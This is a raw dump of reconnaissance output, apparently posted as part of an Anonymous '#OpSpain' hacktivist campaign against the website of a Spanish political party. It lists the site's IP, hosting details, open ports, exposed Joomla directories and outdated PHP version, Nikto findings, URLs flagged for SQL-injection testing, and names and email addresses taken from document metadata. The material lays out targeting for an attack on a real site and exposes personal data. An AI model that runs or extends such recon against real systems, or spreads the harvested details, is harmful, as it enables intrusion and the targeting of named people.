Anonymous JTSEC #OpSpain Full Recon #2

1. #######################################################################################################################################
2. Hostname falange-autentica.es ISP OVH SAS
3. Continent Europe Flag
4. FR
5. Country France Country Code FR
6. Region Unknown Local time 07 Nov 2018 22:25 CET
7. City Unknown Postal Code Unknown
8. IP Address 91.121.2.184 Latitude 48.858
9. Longitude 2.339
10. #######################################################################################################################################
11. > falange-autentica.es
12. Server: 194.187.251.67
13. Address: 194.187.251.67#53
14.  
15. Non-authoritative answer:
16. Name: falange-autentica.es
17. Address: 91.121.2.184
18. #######################################################################################################################################
19. HostIP:91.121.2.184
20. HostName:falange-autentica.es
21.  
22. Gathered Inet-whois information for 91.121.2.184
23. ---------------------------------------------------------------------------------------------------------------------------------------
24.  
25.  
26. inetnum: 91.121.0.0 - 91.121.31.255
27. netname: OVH
28. descr: OVH SAS
29. descr: Dedicated Servers
30. descr: http://www.ovh.com
31. country: FR
32. admin-c: OK217-RIPE
33. tech-c: OTC2-RIPE
34. status: ASSIGNED PA
35. mnt-by: OVH-MNT
36. created: 2006-10-16T12:52:42Z
37. last-modified: 2006-10-16T12:52:42Z
38. source: RIPE
39.  
40. role: OVH Technical Contact
41. address: OVH SAS
42. address: 2 rue Kellermann
43. address: 59100 Roubaix
44. address: France
45. admin-c: OK217-RIPE
46. tech-c: GM84-RIPE
47. tech-c: SL10162-RIPE
48. nic-hdl: OTC2-RIPE
49. abuse-mailbox: abuse@ovh.net
50. mnt-by: OVH-MNT
51. created: 2004-01-28T17:42:29Z
52. last-modified: 2014-09-05T10:47:15Z
53. source: RIPE # Filtered
54.  
55. person: Octave Klaba
56. address: OVH SAS
57. address: 2 rue Kellermann
58. address: 59100 Roubaix
59. address: France
60. phone: +33 9 74 53 13 23
61. nic-hdl: OK217-RIPE
62. mnt-by: OVH-MNT
63. created: 1970-01-01T00:00:00Z
64. last-modified: 2017-10-30T21:44:51Z
65. source: RIPE # Filtered
66.  
67. % Information related to '91.121.0.0/16AS16276'
68.  
69. route: 91.121.0.0/16
70. descr: OVH ISP
71. descr: Paris, France
72. origin: AS16276
73. mnt-by: OVH-MNT
74. created: 2007-10-16T17:33:02Z
75. last-modified: 2007-10-16T17:33:02Z
76. source: RIPE # Filtered
77.  
78. % This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
79.  
80.  
81.  
82. Gathered Inic-whois information for falange-autentica.es
83. ---------------------------------------------------------------------------------------------------------------------------------------
84.  
85. Gathered Netcraft information for falange-autentica.es
86. ---------------------------------------------------------------------------------------------------------------------------------------
87.  
88. Retrieving Netcraft.com information for falange-autentica.es
89. Netcraft.com Information gathered
90.  
91. Gathered Subdomain information for falange-autentica.es
92. ---------------------------------------------------------------------------------------------------------------------------------------
93. Searching Google.com:80...
94. Searching Altavista.com:80...
95. Found 0 possible subdomain(s) for host falange-autentica.es, Searched 0 pages containing 0 results
96.  
97. Gathered E-Mail information for falange-autentica.es
98. ---------------------------------------------------------------------------------------------------------------------------------------
99. Searching Google.com:80...
100. Searching Altavista.com:80...
101. Found 0 E-Mail(s) for host falange-autentica.es, Searched 0 pages containing 0 results
102.  
103. Gathered TCP Port information for 91.121.2.184
104. ---------------------------------------------------------------------------------------------------------------------------------------
105.  
106. Port State
107.  
108. 22/tcp open
109. 80/tcp open
110.  
111. Portscan Finished: Scanned 150 ports, 2 ports were in sta
112. #######################################################################################################################################
113. [i] Scanning Site: http://falange-autentica.es
114.  
115.  
116.  
117. B A S I C I N F O
118. =======================================================================================================================================
119.  
120.  
121. [+] Site Title: Falange Auténtica
122. [+] IP address: 91.121.2.184
123. [+] Web Server: Could Not Detect
124. [+] CMS: Joomla
125. [+] Cloudflare: Not Detected
126. [+] Robots File: Found
127.  
128. -------------[ contents ]----------------
129. # If the Joomla site is installed within a folder such as at
130. # e.g. www.example.com/joomla/ the robots.txt file MUST be
131. # moved to the site root at e.g. www.example.com/robots.txt
132. # AND the joomla folder name MUST be prefixed to the disallowed
133. # path, e.g. the Disallow rule for the /administrator/ folder
134. # MUST be changed to read Disallow: /joomla/administrator/
135. #
136. # For more information about the robots.txt standard, see:
137. # http://www.robotstxt.org/orig.html
138. #
139. # For syntax checking, see:
140. # http://tool.motoricerca.info/robots-checker.phtml
141.  
142. User-agent: *
143. Disallow: /administrator/
144. Disallow: /bin/
145. Disallow: /cache/
146. Disallow: /cli/
147. Disallow: /components/
148. Disallow: /includes/
149. Disallow: /installation/
150. Disallow: /language/
151. Disallow: /layouts/
152. Disallow: /libraries/
153. Disallow: /logs/
154. Disallow: /modules/
155. Disallow: /plugins/
156. Disallow: /tmp/
157.  
158.  
159. -----------[end of contents]-------------
160.  
161.  
162.  
163.  
164. G E O I P L O O K U P
165. =======================================================================================================================================
166.  
167. [i] IP Address: 91.121.2.184
168. [i] Country: FR
169. [i] State: N/A
170. [i] City: N/A
171. [i] Latitude: 48.858200
172. [i] Longitude: 2.338700
173.  
174.  
175.  
176.  
177. H T T P H E A D E R S
178. =======================================================================================================================================
179.  
180.  
181. [i] HTTP/1.1 200 OK
182. [i] Date: Wed, 07 Nov 2018 22:07:06 GMT
183. [i] X-Powered-By: PHP/5.6.14
184. [i] Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=9ao0ophv6hn0pi59ji0fsfv1c2; path=/; HttpOnly
185. [i] Expires: Wed, 17 Aug 2005 00:00:00 GMT
186. [i] Last-Modified: Wed, 07 Nov 2018 22:07:07 GMT
187. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
188. [i] Pragma: no-cache
189. [i] Vary: Accept-Encoding
190. [i] Content-Type: text/html; charset=utf-8
191. [i] Connection: close
192.  
193.  
194.  
195.  
196. D N S L O O K U P
197. =======================================================================================================================================
198.  
199. falange-autentica.es. 21599 IN SOA dns106.ovh.net. tech.ovh.net. 2018100200 86400 3600 3600000 300
200. falange-autentica.es. 21599 IN NS ns106.ovh.net.
201. falange-autentica.es. 21599 IN NS dns106.ovh.net.
202. falange-autentica.es. 21599 IN A 91.121.2.184
203. falange-autentica.es. 599 IN TXT "v=spf1 ip4:46.105.219.212 ~all"
204. falange-autentica.es. 599 IN TXT "v=spf1 a mx ip4:91.121.2.184 ~all"
205. falange-autentica.es. 599 IN TXT "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
206.  
207.  
208.  
209.  
210. S U B N E T C A L C U L A T I O N
211. =======================================================================================================================================
212.  
213. Address = 91.121.2.184
214. Network = 91.121.2.184 / 32
215. Netmask = 255.255.255.255
216. Broadcast = not needed on Point-to-Point links
217. Wildcard Mask = 0.0.0.0
218. Hosts Bits = 0
219. Max. Hosts = 1 (2^0 - 0)
220. Host Range = { 91.121.2.184 - 91.121.2.184 }
221.  
222.  
223.  
224. N M A P P O R T S C A N
225. =======================================================================================================================================
226.  
227.  
228. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-07 22:07 UTC
229. Nmap scan report for falange-autentica.es (91.121.2.184)
230. Host is up (0.076s latency).
231. PORT STATE SERVICE
232. 21/tcp filtered ftp
233. 22/tcp open ssh
234. 23/tcp filtered telnet
235. 80/tcp open http
236. 110/tcp filtered pop3
237. 143/tcp filtered imap
238. 443/tcp open https
239. 3389/tcp filtered ms-wbt-server
240.  
241. Nmap done: 1 IP address (1 host up) scanned in 2.08 seconds
242. #######################################################################################################################################
243.  
244. [?] Enter the target: http://falange-autentica.es/
245. [!] IP Address : 91.121.2.184
246. [!] falange-autentica.es doesn't seem to use a CMS
247. [+] Honeypot Probabilty: 30%
248. ---------------------------------------------------------------------------------------------------------------------------------------
249. [~] Trying to gather whois information for falange-autentica.es
250. [+] Whois information found
251. [-] Unable to build response, visit https://who.is/whois/falange-autentica.es
252. ---------------------------------------------------------------------------------------------------------------------------------------
253. PORT STATE SERVICE
254. 21/tcp filtered ftp
255. 22/tcp open ssh
256. 23/tcp filtered telnet
257. 80/tcp open http
258. 110/tcp filtered pop3
259. 143/tcp filtered imap
260. 443/tcp open https
261. 3389/tcp filtered ms-wbt-server
262. Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
263. ---------------------------------------------------------------------------------------------------------------------------------------
264.  
265. [+] DNS Records
266. ns106.ovh.net. (213.251.128.150) AS16276 OVH SAS France
267. dns106.ovh.net. (213.251.188.150) AS16276 OVH SAS France
268.  
269. [+] Host Records (A)
270. falange-autentica.esHTTP: (falange-autentica.es) (91.121.2.184) AS16276 OVH SAS France
271.  
272. [+] TXT Records
273. "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
274. "v=spf1 a mx ip4:91.121.2.184 ~all"
275. "v=spf1 ip4:46.105.219.212 ~all"
276.  
277. [+] DNS Map: https://dnsdumpster.com/static/map/falange-autentica.es.png
278.  
279. [>] Initiating 3 intel modules
280. [>] Loading Alpha module (1/3)
281. [>] Beta module deployed (2/3)
282. [>] Gamma module initiated (3/3)
283. No emails found
284.  
285. [+] Hosts found in search engines:
286. ---------------------------------------------------------------------------------------------------------------------------------------
287. [-] Resolving hostnames IPs...
288. 91.121.2.184:www.falange-autentica.es
289. [+] Virtual hosts:
290. ---------------------------------------------------------------------------------------------------------------------------------------
291. [~] Crawling the target for fuzzable URLs
292. [+] Found 3 fuzzable URLs
293. http://falange-autentica.es///descargas/category/1-documentos-de-fa?download=12:decalogo-de-actuacion-de-falange-autentica
294. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
295. #######################################################################################################################################
296. ; <<>> DiG 9.11.5-1-Debian <<>> falange-autentica.es
297. ;; global options: +cmd
298. ;; Got answer:
299. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39060
300. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
301.  
302. ;; OPT PSEUDOSECTION:
303. ; EDNS: version: 0, flags:; udp: 4096
304. ;; QUESTION SECTION:
305. ;falange-autentica.es. IN A
306.  
307. ;; ANSWER SECTION:
308. falange-autentica.es. 82921 IN A 91.121.2.184
309.  
310. ;; Query time: 118 msec
311. ;; SERVER: 194.187.251.67#53(194.187.251.67)
312. ;; WHEN: mer nov 07 17:22:57 EST 2018
313. ;; MSG SIZE rcvd: 65
314. #######################################################################################################################################
315.  
316. [+] Hosting Info for Website: falange-autentica.es
317. [+] Visitors per day: < 200
318. [+] IP Address: ...
319. [+] IP Reverse DNS (Host): falange-autentica.es
320. [+] Hosting Company: Ovh Sas
321. [+] Hosting IP Range: 91.121.0.0 - 91.121.255.255 (65,536 ip)
322. [+] Hosting Address: 140 Quai Du Sartel, 59100 Roubaix, France
323. [+] Hosting Country: FRA
324. [+] Hosting Phone: +33 9 7453 1323, +33 3 2020 0957
325. [+] Hosting Website: www.ovh.com
326. [+] Hosting CIDR: 91.121.0.0/16
327.  
328. [+] NS: ns106.ovh.net
329. [+] NS: dns106.ovh.net
330.  
331. #######################################################################################################################################
332. ; <<>> DiG 9.11.5-1-Debian <<>> +trace falange-autentica.es
333. ;; global options: +cmd
334. . 82650 IN NS d.root-servers.net.
335. . 82650 IN NS k.root-servers.net.
336. . 82650 IN NS i.root-servers.net.
337. . 82650 IN NS a.root-servers.net.
338. . 82650 IN NS e.root-servers.net.
339. . 82650 IN NS f.root-servers.net.
340. . 82650 IN NS c.root-servers.net.
341. . 82650 IN NS j.root-servers.net.
342. . 82650 IN NS b.root-servers.net.
343. . 82650 IN NS m.root-servers.net.
344. . 82650 IN NS l.root-servers.net.
345. . 82650 IN NS h.root-servers.net.
346. . 82650 IN NS g.root-servers.net.
347. . 82650 IN RRSIG NS 8 0 518400 20181120170000 20181107160000 2134 . EVTqzwzG0hnuJKklOR7lNHckad/RioIyUapKgDQgyj4Q0Zu+EfA1hNvR TN1sKG2sEpsMd20tqRWThT1YOc284u/LoHJAU9DeMrAqfzoyvaU8/8gT h+2lod/iTuPNgPiY0QGucvxflIzL+u3KG5G0xRxlGWdxYUpWKwAGN3O1 whxDrD3kJR3Ye/2+qpvAOTqRHJ1Ka5NrvtjTQT68ez/IajhkUVny2ZsH rmrxAkIhPRTlOOXYG8EBTj8Tv2Rsazf5AwSL+X8Of5XECRVAmc/+z9AR GjJHHvDY2xA1MCL77TSDQ81fcVd6fgoP7GKevQdWG9T7/ILtPrcbtFRk leXAUw==
348. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 122 ms
349.  
350. es. 172800 IN NS ns-ext.nic.cl.
351. es. 172800 IN NS g.nic.es.
352. es. 172800 IN NS a.nic.es.
353. es. 172800 IN NS ns3.nic.fr.
354. es. 172800 IN NS ns1.cesca.es.
355. es. 172800 IN NS f.nic.es.
356. es. 172800 IN NS sns-pb.isc.org.
357. es. 86400 IN DS 29450 8 1 417BEAFB46ABF3430B75C5C29AEF785D476B60E1
358. es. 86400 IN DS 29450 8 2 8BEC32A2C9CFE42E393BAF81FFE71B521D3E940612A4590B4763ADC5 39E4B563
359. es. 86400 IN DS 44290 8 1 7711F564D55B41C8CE7DFAF4DD323C5B271F86CD
360. es. 86400 IN DS 44290 8 2 562EF35E7065588A7178A4BD0155C8527F029C82AA455DD359C84908 B2A7FE17
361. es. 86400 IN RRSIG DS 8 1 86400 20181120170000 20181107160000 2134 . z6ORJ779JiCk9ZSEYD5qnh3cD5jOFWer10n8NfgcKB9bxLYHbxdotJAo m8Qio1YhqhI6LB7SdMp4Qi0Mpt71HcO3jhdQBcD08o+dTws+YwRYb7qC VhPTY2gMoI8pMkhZhCZK827HcCLFkvza1NIV9LMOs015U0x22DOASXtS 8zKn9MnW2aywbyAkS3m1X+y2n56DA5qlA80ObijjkTtlavqWaLRkvBxI oEO3RqMYhGXp0ARvygUkQKlPnjzBr2W+BxYQd9EktzvvF1iat/2gFsXC xC9qPgtVx9i9xT23TMET3vScxASN5kT7ESE6R2AxfYx7YskcGpcGRGHM /S3nNQ==
362. ;; Received 995 bytes from 2001:500:2f::f#53(f.root-servers.net) in 377 ms
363.  
364. falange-autentica.es. 86400 IN NS dns106.ovh.net.
365. falange-autentica.es. 86400 IN NS ns106.ovh.net.
366. spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 SPOVUI8LLS5HHLJ0I6TEK8ODTJ0PV8PM NS SOA RRSIG DNSKEY NSEC3PARAM
367. spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121051641 20181107010649 64315 es. WibiqeGxP7swWy8WJMC67rD0fXoQlpMxJPJJunU2YlLDMXZ3Fd4U2RK7 rHsIA/dsEO41GCa9V4v9khQBqCohEaxtna2hamwhfax+k2LsNP62oy0S nuP4HSwtH+fc4zBY5w42orQnksL0mxd4WgU0fC/zRJaOc5NelfeKRvM0 GAs=
368. 8tv8o4m77cpqau0bg4jo93okkp1ilfg2.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 8U28NLNHQSDPDBK8C201MOME1I7TT22I NS DS RRSIG
369. 8tv8o4m77cpqau0bg4jo93okkp1ilfg2.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121094347 20181107073540 22150 es. DczNf3zLq8Zw2pa0uaspr6GvATBEYJm7nO4faMHIeTJxCkKITzf+O1HR Jxu7e/8yHuGYHbzD8ABVLnUbLirAlks4e6ENfGBLPvwS7mxBgpgV849z vcoe51fBThvolELyHkG94FenjHOLKRZ/eD1BS35pH+h029h5DVgQUOjp iRY=
370. ;; Received 596 bytes from 130.206.1.7#53(f.nic.es) in 160 ms
371.  
372. falange-autentica.es. 86400 IN A 91.121.2.184
373. ;; Received 65 bytes from 2001:41d0:1:1996::1#53(ns106.ovh.net) in 121 ms
374.  
375. #######################################################################################################################################
376. [+] Testing domain
377. www.falange-autentica.es 91.121.2.184
378. [+] Dns resolving
379. Domain name Ip address Name server
380. falange-autentica.es 91.121.2.184 falange-autentica.es
381. Found 1 host(s) for falange-autentica.es
382. [+] Testing wildcard
383. Ok, no wildcard found.
384.  
385. [+] Scanning for subdomain on falange-autentica.es
386. [!] Wordlist not specified. I scannig with my internal wordlist...
387. Estimated time about 68.35 seconds
388.  
389. Subdomain Ip address Name server
390.  
391. mail.falange-autentica.es 91.121.2.184 falange-autentica.es
392. smtp.falange-autentica.es 193.70.18.144 ssl0.ovh.net
393. www.falange-autentica.es 91.121.2.184 falange-autentica.es
394. #######################################################################################################################################
395. Ip Address Status Type Domain Name Server
396. ---------------------------------------------------------------------------------------------------------------------------------------
397. 91.121.2.184 302 host mail.falange-autentica.es Apache
398. 193.70.18.144 301 alias smtp.falange-autentica.es
399. 193.70.18.144 301 host ns0.ovh.net
400. 91.121.2.184 200 alias www.falange-autentica.es Apache
401. 91.121.2.184 200 host falange-autentica.es Apache
402. #######################################################################################################################################
403. [*] Performing General Enumeration of Domain: falange-autentica.es
404. [-] DNSSEC is not configured for falange-autentica.es
405. [*] SOA dns106.ovh.net 213.251.188.150
406. [*] NS dns106.ovh.net 213.251.188.150
407. [*] Bind Version for 213.251.188.150 [Secured]
408. [*] NS dns106.ovh.net 2001:41d0:1:4a96::1
409. [*] Bind Version for 2001:41d0:1:4a96::1 [Secured]
410. [*] NS ns106.ovh.net 213.251.128.150
411. [*] Bind Version for 213.251.128.150 [Secured]
412. [*] NS ns106.ovh.net 2001:41d0:1:1996::1
413. [*] Bind Version for 2001:41d0:1:1996::1 [Secured]
414. [-] Could not Resolve MX Records for falange-autentica.es
415. [*] A falange-autentica.es 91.121.2.184
416. [*] TXT falange-autentica.es v=spf1 a mx ip4:91.121.2.184 ~all
417. [*] TXT falange-autentica.es google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE
418. [*] TXT falange-autentica.es v=spf1 ip4:46.105.219.212 ~all
419. [*] Enumerating SRV Records
420. [-] No SRV Records Found for falange-autentica.es
421. [+] 0 Records Found
422. #######################################################################################################################################
423. [*] Processing domain falange-autentica.es
424. [+] Getting nameservers
425. 213.251.188.150 - dns106.ovh.net
426. 213.251.128.150 - ns106.ovh.net
427. [-] Zone transfer failed
428.  
429. [+] TXT records found
430. "v=spf1 a mx ip4:91.121.2.184 ~all"
431. "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
432. "v=spf1 ip4:46.105.219.212 ~all"
433.  
434. [*] Scanning falange-autentica.es for A records
435. 91.121.2.184 - falange-autentica.es
436. 91.121.2.184 - mail.falange-autentica.es
437. 193.70.18.144 - smtp.falange-autentica.es
438. 91.121.2.184 - www.falange-autentica.es
439.  
440. #######################################################################################################################################
441. Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 11/07/18 17:45:38
442. Parsero scan report for falange-autentica.es
443. http://falange-autentica.es/components/ 200 OK
444. http://falange-autentica.es/administrator/ 301 Moved Permanently
445. http://falange-autentica.es/libraries/ 200 OK
446. http://falange-autentica.es/tmp/ 200 OK
447. http://falange-autentica.es/layouts/ 200 OK
448. http://falange-autentica.es/cache/ 200 OK
449. http://falange-autentica.es/bin/ 200 OK
450. http://falange-autentica.es/language/ 200 OK
451. http://falange-autentica.es/logs/ 200 OK
452. http://falange-autentica.es/includes/ 200 OK
453. http://falange-autentica.es/cli/ 200 OK
454. http://falange-autentica.es/plugins/ 200 OK
455. http://falange-autentica.es/installation/ 404 Not Found
456. http://falange-autentica.es/modules/ 200 OK
457.  
458. [+] 14 links have been analyzed and 12 of them are available!!!
459. #######################################################################################################################################
460. Start: 2018-11-07T22:49:27+0000
461. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
462. 1.|-- 45.79.12.202 0.0% 3 0.7 1.1 0.7 1.7 0.6
463. 2.|-- 45.79.12.6 0.0% 3 0.8 0.8 0.6 1.1 0.3
464. 3.|-- 45.79.12.8 0.0% 3 0.8 0.7 0.5 0.9 0.2
465. 4.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
466. 5.|-- be100-2.dfw-da2-bb1-a9.tx.us 0.0% 3 1.9 2.0 1.9 2.2 0.2
467. 6.|-- ash-1-a9.tx.us 0.0% 3 32.1 32.4 32.0 33.0 0.6
468. 7.|-- be100-1039.nwk-1-a9.nj.us 0.0% 3 37.3 37.3 37.3 37.3 0.0
469. 8.|-- be100-1295.ldn-1-a9.uk.eu 0.0% 3 103.5 103.6 103.5 103.7 0.1
470. 9.|-- be100-1041.rbx-g1-nc5.fr.eu 0.0% 3 107.4 107.8 107.4 108.4 0.5
471. 10.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
472. 11.|-- rbx1-c1-a72.fr.eu 0.0% 3 106.5 106.6 106.5 106.9 0.2
473. 12.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
474. 13.|-- falange-autentica.es 0.0% 3 106.3 106.4 106.3 106.4 0.0
475.  
476. #######################################################################################################################################
477. ---------------------------------------------------------------------------------------------------------------------------------------
478. + Target IP: 91.121.2.184
479. + Target Hostname: 91.121.2.184
480. + Target Port: 443
481. ---------------------------------------------------------------------------------------------------------------------------------------
482. + SSL Info: Subject: /CN=azulmania.es
483. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
484. Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
485. + Start Time: 2018-11-07 17:08:42 (GMT-5)
486. ---------------------------------------------------------------------------------------------------------------------------------------
487. + Server: Apache
488. + Retrieved x-powered-by header: PHP/5.6.14
489. + The anti-clickjacking X-Frame-Options header is not present.
490. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
491. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
492. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
493. + Root page / redirects to: http://azulmania.es/
494. + "robots.txt" contains 85 entries which should be manually viewed.
495. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
496. + Hostname '91.121.2.184' does not match certificate's names: azulmania.es
497. + 8431 requests: 0 error(s) and 8 item(s) reported on remote host
498. + End Time: 2018-11-07 18:34:09 (GMT-5) (5127 seconds)
499. ---------------------------------------------------------------------------------------------------------------------------------------
500. #######################################################################################################################################
501. ---------------------------------------------------------------------------------------------------------------------------------------
502. + Target IP: 91.121.2.184
503. + Target Hostname: falange-autentica.es
504. + Target Port: 80
505. + Start Time: 2018-11-07 17:07:57 (GMT-5)
506. ---------------------------------------------------------------------------------------------------------------------------------------
507. + Server: No banner retrieved
508. + Retrieved x-powered-by header: PHP/5.6.14
509. + The anti-clickjacking X-Frame-Options header is not present.
510. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
511. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
512. + Server leaks inodes via ETags, header found with file /robots.txt, inode: 2361571, size: 842, mtime: Thu Dec 24 12:51:58 2015
513. + Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (301)
514. + Entry '/bin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
515. + Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
516. + Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
517. + Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
518. + Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
519. + Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
520. + Entry '/layouts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
521. + Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
522. + Entry '/logs/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
523. + Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
524. + Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
525. + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
526. + "robots.txt" contains 14 entries which should be manually viewed.
527. + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
528. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
529. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
530. + Server banner has changed from '' to 'Apache' which may suggest a WAF, load balancer or proxy is in place
531. + /servlet/webacc?User.html=noexist: Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.
532. + /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
533. + OSVDB-578: /level/16: CISCO HTTP service allows remote execution of commands
534. + OSVDB-155: /counter/1/n/n/0/3/5/0/a/123.gif: The Roxen Counter may eat up excessive CPU time with image requests.
535. #######################################################################################################################################
536. dnsenum VERSION:1.2.4
537.  
538. ----- falange-autentica.es -----
539.  
540.  
541. Host's addresses:
542. __________________
543.  
544. falange-autentica.es. 83723 IN A 91.121.2.184
545.  
546.  
547. Name Servers:
548. ______________
549.  
550. dns106.ovh.net. 86126 IN A 213.251.188.150
551. ns106.ovh.net. 86125 IN A 213.251.128.150
552.  
553.  
554. Mail (MX) Servers:
555. ___________________
556.  
557.  
558.  
559. Trying Zone Transfers and getting Bind Versions:
560. _________________________________________________
561.  
562.  
563. Trying Zone Transfer for falange-autentica.es on dns106.ovh.net ...
564.  
565. Trying Zone Transfer for falange-autentica.es on ns106.ovh.net ...
566.  
567. brute force file not specified, bay.
568. #######################################################################################################################################
569. ---------------------------------------------------------------------------------------------------------------------------------------
570. [2/25] http://www.falange-autentica.es/fa/pica/pica004.pdf
571. [3/25] http://www.falange-autentica.es/fa/docus/Mocion_FA_Pobreza_Cero.pdf
572. [4/25] http://www.falange-autentica.es/fa/gora_beti/gora_beti001.pdf
573. [5/25] http://www.falange-autentica.es/fa/docus/doc15.pdf
574. [6/25] http://www.falange-autentica.es/fa/amina/t_amina.pdf
575. [7/25] http://www.falange-autentica.es/fa/amina/solicitud.pdf
576. [8/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_torrevieja.pdf
577. [9/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_hoyo.pdf
578. [10/25] http://www.falange-autentica.es/fa/pica/pica002-seg.pdf
579. [11/25] http://falange-autentica.es/fa/mayo2003/programas/p_ardales.pdf
580. [12/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_guarena.pdf
581. [13/25] http://falange-autentica.es/fa/generales2004/20040228-alicante.pdf
582. [14/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D49:horizonte-n-15
583. [x] Error in the parsing process
584. [15/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D32:envio-n-8
585. [x] Error in the parsing process
586. [16/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D41:pica-n-6
587. [x] Error in the parsing process
588. [17/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D38:pica-n-3
589. [x] Error in the parsing process
590. [18/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D33:envio-n-9
591. [x] Error in the parsing process
592. [19/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D29:envio-n-5
593. [x] Error in the parsing process
594. [20/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D59:horizonte-n-28
595. [x] Error in the parsing process
596. [21/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D53:horizonte-n-21
597. [x] Error in the parsing process
598. [22/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D57:horizonte-n-25
599. [x] Error in the parsing process
600. [23/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D42:pica-n-7
601. [x] Error in the parsing process
602. [24/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D60:horizonte-n-29
603. [x] Error in the parsing process
604. [25/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D50:horizonte-n-16
605. [x] Error in the parsing process
606. #######################################################################################################################################
607. ---------------------------------------------------------------------------------------------------------------------------------------
608. Francisco Ortiz Lozano
609. ��Teo
610. Falange Aut�ntica de Euskalerr�a
611. COngreso Constituyente. Noviembre de 2002
612. Falange Aut�ntica
613. ��Torpedo
614. Torpedo
615.  
616. [+] List of software found:
617. ---------------------------------------------------------------------------------------------------------------------------------------
618. Acrobat Distiller 5.0 (Windows)
619. ADOBEPS4.DRV Version 4.50
620. Acrobat PDFWriter 5.0 para Windows NT
621. ��Moci�n FA Pobreza Cero.doc - Microsoft Word
622. PScript5.dll Version 5.2
623. ofi solicitud mocion - Microsoft Word
624. ��programa torrevieja def - Microsoft Word
625. Programa Hoyo - Microsoft Word
626. Programa de Ardales - Microsoft Word
627. Programa Guare�a - Microsoft Word
628. ��NOTA RUEDA DE PRENSA.doc - Microsoft Word
629. ---------------------------------------------------------------------------------------------------------------------------------------
630.  
631. [+] List of e-mails found:
632. --------------------------------------------------------------------------------------------------------------------------------------
633. euskalerria@falange-autentica.org
634. vegabaja@falange-autentica.org
635. vegabaja@falange
636. comunicacion@falange-
637. ntic@s
638. n@falange-
639. ---------------------------------------------------------------------------------------------------------------------------------------
640. #######################################################################################################################################
641.  
642. ____ _ _ _ _ _____
643. / ___| _ _| |__ | (_)___| |_|___ / _ __
644. \___ \| | | | '_ \| | / __| __| |_ \| '__|
645. ___) | |_| | |_) | | \__ \ |_ ___) | |
646. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
647.  
648. # Coded By Ahmed Aboul-Ela - @aboul3la
649.  
650. [-] Enumerating subdomains now for falange-autentica.es
651. [-] verbosity is enabled, will show the subdomains results in realtime
652. [-] Searching now in Baidu..
